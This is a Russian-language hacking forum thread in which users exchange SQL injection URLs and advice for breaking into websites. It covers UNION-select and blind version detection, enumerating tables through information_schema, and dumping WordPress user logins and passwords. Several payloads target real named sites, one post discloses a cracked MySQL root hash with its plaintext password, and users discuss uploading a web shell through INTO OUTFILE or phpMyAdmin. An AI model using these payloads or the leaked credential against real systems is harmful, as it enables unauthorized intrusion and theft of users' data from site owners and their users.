Зачем тебе ошибки? Ты принтабельные поля ищи. source страницы покопай. +union+select+111,222,333,444/* для удобства, и ищи.
http://www.xxxx.com/news.php?type=16+and+1=2+union+select+1,version(),3,4/* http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4+limit+1,1/*
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* так ты никогда не увидишь версию, надо ставить несуществующию запись Если http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/* не помогает, попробуй так http://www.xxxx.com/news.php?type=-16'+union+select+1,2,3,4/* если и так не катит скидывай ссылку сюда или в пм
Та бывает такое, что нет ниодного поля с выводом на экран. попробуй вот так: PHP: http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=51 это будет значить, что mysql 3 версии PHP: http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=52 это будет значить, что mysql 4 версии PHP: http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=53 это будет значить, что mysql 5 версии В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
Попробуй ещё так http://www.xxxx.com/news.php?type=16+union+select+'-16+union+select+1,2,3,4'+limit+1,1/* Или перегони в хекс, если кавычки экранируются\слэшируются.Вообще подобная двойная конструкция, внутри union select может сработать. Пробуй.
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы... то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
То есть если вывод ошибок отключён, при правильном запросе должно показывать, то что мне нужно. так ?
ну это понятно)))) я по посимвольному брутфорсу в мускуле 5 статью помню писал на ачате =) Только потом сам ее и удалил, если каму надо могу выложить http://slil.ru/26301742 вот залил, надеюсь каму нить она поможет... http://depositfiles.com/files/nq76bn4ca http://www.sendspace.com/file/3snrub
http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/* Значит ситуация такая - есть куча табл с юзерами но доступ к ним и некоторым полям их запрещен, конструкции unhex(hex()), aes_de... не помогают. Зато есть доступ к mysql.user оттудова я стянул и сбрутил пасс рута. ROOT:*85FD004275C6D61CD6CAD3DEC994E8E326F5AEF2(nclmswpq) Включен file_priv, можно читать диры сайта. /home/www/htdocs/SNGBOARD/admin - нельзя прочитать /home/www/phpmyadmin - нельзя прочитать Пробовал залить шелл через into outfile в диру /home/www/htdocs/sngboard так как кавычки фильтруются юзал подзапросы но тоже безрезультатно собсно вопросы: - что можно сделать с рутом от мускуля? - что можно найти интересного в дирах? - и какже всетаки залить шелл?
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7-- Ошибку выводит You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1 Число столбцов определил "order by" Что делать не представляю
помогите плиз! подобрать колонки скуль: http://sport-life.ru/shop/index.php?section=1+union+select+version(),2,3,4,5+from+users/* которые нашёл: firstname, id, lastNamE, address, phone
beerhack Доступ есть ко всем таблицам просто они в разных базах: http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,table_schema,table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/* И нужно писать их маленькими буквами Вот напимер доступ к одной из них: http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+wordpress.wp_users/* Ковычки экранируются, и значит через инъекцию ты шелл не зальёшь, пробуй через админку
@beerhack подключиться к мускулу, разумеется если сервер разрешает удаленные подключения (по умолчанию порт 3306). Или же воспользоваться phpmyadmin, если он установлен на удаленном сервере и ты знаешь путь до него скрипт-аплоадер им же
